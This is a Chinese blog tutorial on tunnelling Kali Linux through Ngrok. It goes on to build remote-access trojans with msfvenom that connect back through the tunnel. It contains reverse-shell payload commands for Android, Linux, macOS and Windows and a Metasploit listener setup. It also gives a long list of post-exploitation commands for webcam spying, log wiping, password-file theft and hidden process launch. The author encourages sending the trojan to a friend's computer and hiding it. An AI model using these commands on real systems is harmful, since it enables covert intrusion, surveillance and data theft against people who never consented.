项目笔记:Kali使用Ngrok进行内网穿透

已于 2025-01-17 12:03:06 修改
阅读量693 收藏 13
点赞数 4
文章标签: 服务器 网络 安全 笔记
于 2025-01-15 23:22:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/basicsffds/article/details/145169343
版权

       注:本文章仅用于娱乐,请按照《中华人民共和国网络安全法》规范使用

什么是内网穿透

                内网穿透,也被称为NAT(网络地址转换)穿透或内网映射,是一种将本地网络服务暴露给互联网的技术。简单来说,就是让处于局域网(内网)内的设备能够通过互联网进行通信,实现远程访问和操作。

原理如下

  1. 端口映射:在路由器级别进行配置,将外部端口的请求转发到内网设备上的特定端口。
  2. 反向代理:使用反向代理服务器接收外部请求,并将其转发到内网服务上。
  3. VPN:在网络中创建一个加密的“隧道”,允许远程设备安全地访问内网资源。

 

667b0fd58cfe4fb2ad5d5b9f09cc3347.png

常见的内网穿透工具有FRP,NPS,花生壳,Ngrok等,这里就用Ngrok进行简单示范

实操:

准备工具:KALI LINUX

1:进入Ngrok官网(http://www.ngrok.cc

cc361a769bdb4fa79e1b57ca45b56924.png

注册帐号之后点隧道管理——开通隧道——划拉到最底下有免费的(白嫖党狂喜)

之后开始配置

c74599b9ff08453cbe8fccb573492494.png

隧道协议选择tcp(足够用了)名称随便起一个,IP和端口填你kali的端口,主机的也行(麻烦)不过填KALi的ip和端口的话要把你网路模式改到NAT模式

280d9f699cf04636a8a48b7c550a872e.png

141da536de2b4bf9b11d7bedefb0140e.png

填写好之后保存,然后安装Ngrok客户端(http://www.ngrok.cc

30fd28903f354959a164075cbc656116.png

下载好之后拖到kali里面,在里面解压

解压指令

unzip 压缩包名称

c31d382bd7ae43f2af11c66d2b469704.png

进入解压好的目录并开始运行

运行代码

./sunny --server=xxx.xxx.com:端口[赠送域名还有端口] --key=[隧道id]

 

c5abc71400a848c58a92303b3110cd27.png

至此,大功告成,我们可以找一台不在同一个局域网的主机ping一下

渗透测试

我们可以随便搞点什么试验一下,比如说用cs,或者用MSF生成外网木马程序之类的

这里我附上msf生成木马程序的指令

安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=520 -o /shell.apk  
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=520-f  elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=0.0.0.0 LPORT=520 -f macho >  shell.macho
windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=0.0.0.0 lport=520 -f exe -o /root/shell.exe

注意lhost填隧道上面的域名,lport填TCP域名后面的端口

木马原理也很简单

e81af4c140de4dfea90f003e9dfeaadd.png

 

ab56236b135d4e7ca71549b534845415.png

生成好木马之后打开msfconsole设置攻击载荷

6355bb4c984d4f5f8cd40c59cf09685b.png

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 本机ip
set LPORT 在隧道上填的端口

注意不同的系统有不同的攻击载荷摘不到的话直接set+生成木马指令后面那一坨

6494152b1b4042909816b4141d69b39a.png

之后就run吧(开始监听)然后吧木马发到靶机或者你朋友电脑上(记得进行隐藏后期我会出教程)

971bbbe462154ea58ee0507d50179099.png

cb02148f553d4a6fa2fc72474a53fa42.png

因为我的靶机被奇安信天擎整崩了不方便演示大家可以自行尝试

 

附上msfconsole后渗透指令

webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
clearev #清除windows中的应用程序日志、系统日志、安全日志,需要管理员权限
enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接,这方法有点问题,上传了exe但是启动不了
background # 让meterpreter处于后台模式
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
getwd 或者pwd # 查看当前工作目录  
ls
cd
cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件  没有的话,会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2  #只能在当前目录下创建文件夹
rmdir lltest2  #只能删除当前目录下文件夹
getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
lcd /tmp   #操作攻击者主机 切换目录
search -f *secret*.doc  #全局搜索secret.doc这个文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘
uictl enable mouse  #开启鼠标
enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab

由于时间安排这段时间并不会出太多笔记,之后我会给大家分享HW经验,面试题,个人网站搭建,包括最近很火的单片机制作小智AI等

完结撒花~

 

 

 

 

 

羊的笔记
关注
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1196
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
ngrok下载安装使用,并配置内网穿透,配置ngrok
最新发布
zhangfuping123456789的博客
06-10 723
ngrok内网穿透
ngrok | 内网穿透,支持 HTTPS、国内访问、静态域名
热门推荐
追风2019
09-07 1万+
当我们需要把本地开发的应用展示给外部用户时,常常会因为无法直接访问而陷入困境。就为了展示一下,买服务、域名,搭环境,费钱又费事。那有没有办法,让客户直接访问自己本机开发的应用呢?这种需求场景这么多,当然有现成的技术 —— 内网穿透内网穿透是一种网络技术,它允许外部互联网用户访问部署在本地网络(内网)中的服务或设备。通常,家庭或企业网络都位于内网,连接到外部互联网需要通过 NAT(网络地址转换)或者路由器来实现。NAT 问题。
Ngrok内网穿透教程
weixin_63688632的博客
04-29 355
跑通项目,前端端口80931.下载解压ngrok2.打开解压的ngork.exe可执行文件3.登录到ngrok官网里在Setup页面中复制,运行ngrok config add-authtoken <token> 4.运行ngrok http http://localhost:8093,<前端端口号>Forwarding 第一个地址就是穿透地址,可以根据这个地址访问内网系统由于每一次启动穿透网址都不一样,不利于持久访问解决:在ngrok官网里的Universal Gateway目录的Domains页面创建一
Ngrok实现内网穿透
第九系艾文
08-21 2363
Ngrok实现内网穿透
使用ngrok内网穿透
wenpan的博客
07-24 778
需要到刚才解压ngrok的目录下执行如下命令,后面的是官网上查看到的authtoken。然后你就可以在外网拿着这个域名来访问你本地的localhost8080端口了!由于这是免费的内网穿透,所以只允许同时绑定一个端口,无法同时绑定多个端口。需要到ngrok解压的目录下执行该命令,不然会无法识别ngrok命令。执行如下命令,建立一条和本机8080端口(可自己选择)的隧道。执行成功后,过1s钟便会出现如下界面。自己创建一个web工程,编写一个接口。先到官网查看你的authtoken。...
Ngrok内网穿透
qq_40804139的博客
02-19 726
什么是内网穿透 内网穿透即NAT穿透(Network Address Translation),简单的说就是映射端口,能让外网的电脑找到处于内网的电脑。 什么时候会用到内网穿透 可以实现内网穿透的几款工具 Ngrok Ngrok可以将你的内网映射到公网上面,这样就可以在公网访问你的本地网络服务。 ngrok使用步骤如下: 进入 ngrok官网,注册ngrok账号并下载ngrok; 根据官网给定...
ngrok内网穿透
Good Luck
08-11 358
1.下载ngrok.exe。3.复制Authtoken。4.启动ngrok.exe。
kali视频学习笔记
cj1064789374的博客
08-29 3341
kali学习笔记
【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用(1)
2401_84969722的博客
05-13 453
假如此时已经拿到了边界服务器Windows2012的权限,但是由于防火墙限制,进网端口被限制,但可以出网,此时就可以将边界服务器的端口转发到kali上,然后访问kali的端口。(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用
2401_84969746的博客
05-13 1113
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
极品靶场,多种玩法【实战】红日靶场七:内网综合渗透
Eason_LYC安全白帽子的成长博客
10-19 1231
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
内网穿透ngrok
青春年少不知疼的博客
05-05 3075
内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。简单来说,就是让身处局域网的电脑,被大家都能访问的技术。
ngrok实现内网穿透
呆萌很的博客
05-10 2103
ngrok实现内网穿透
使用 ngrok 实现内网穿透
十一逐星的博客
06-18 1479
\ngrok http -hostname 你的自定义域名 3000ngrok 是一个强大的工具,可以帮助开发者轻松地将本地服务暴露给公网,无论是进行远程调试、演示还是开发。希望本文能帮助你快速上手 ngrok使用
kali-frp内网穿透
乌托托的博客
12-24 1866
什么是内网穿透?内网,就是在公司或者家庭内部,建立的局域网络或者是办公网络,可以实现多台电脑之间的资源共享,包括设备、资料、数据等。而外网则是通过一个网关与其它的网络系统连接,相对于内网而言,这种网络系统称之为外部网络,常见的就是我们日常使用的互联网。一般而言,在没有固定公网IP的情况下,外网设备无法直接访问内网设备。而内网穿透技术,顾名思义就是能让外网的设备找到处于内网的设备,从而实现数据通信。内网穿透的原理内网穿透,又称为NAT穿透。
如何在Kali linux简单内网穿透
Sunspot
03-27 1761
注意:将替换为您想要绑定到本地的端口号,和替换为您要访问的内部服务器的IP地址和端口号,和替换为您远程服务器的用户名和IP地址。在公网服务器上运行服务端软件,将其配置为监听指定端口。这将在公网服务器上创建一个反向SSH隧道,将公网服务器的指定端口转发到内网机器的SSH端口上。这将在公网服务器上创建一个反向SSH隧道,将公网服务器的指定端口转发到内网机器的SSH端口上。
kali设置ngrok内网穿透教程
01-10
### Kali Linux 上设置 Ngrok 进行内网穿透 #### 安装 Ngrok 客户端 为了在 Kali Linux 中使用 Ngrok 实现内网穿透,需先下载并安装 Ngrok 的客户端。访问官方网站 https://ngrok.com/ 或者国内镜像站点获取最新版的 Ngrok 下载链接[^2]。 #### 注册账户与认证 前往 Ngrok 官方网站注册账号,推荐通过 GitHub 账号直接登录以规避可能遇到的验证码问题。完成注册后,在个人页面找到 Authtoken 并保存下来;此令牌用于激活本地计算机上的 Ngrok 服务。 ```bash ./ngrok authtoken your_auth_token_here ``` 上述命令中的 `your_auth_token_here` 需替换为实际获得的授权码字符串。 #### 启动隧道服务 成功绑定账号后即可创建新的隧道连接。假设要暴露本地运行的一个 HTTP Web 应用程序,则可执行如下指令: ```bash ./ngrok http 80 ``` 这条语句表示将本机第 80 号端口映射至互联网上随机分配的一个公共 URL 地址下[^4]。 对于更复杂的场景如远程桌面共享或是其他 TCP 协议支持的服务,也可以指定不同的参数来满足需求。例如建立 SSH 访问通道: ```bash ./ngrok tcp 22 ``` 这会把本地 SSH 服务开放出去供外部网络接入。 #### 设置持久化连接 (可选) 如果希望构建更加稳定可靠的长期在线环境,考虑利用 Crontab 或 Systemd 等机制确保 Ngrok 进程始终处于活动状态。另外还可以借助特定脚本来定期重启或监控其工作状况[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值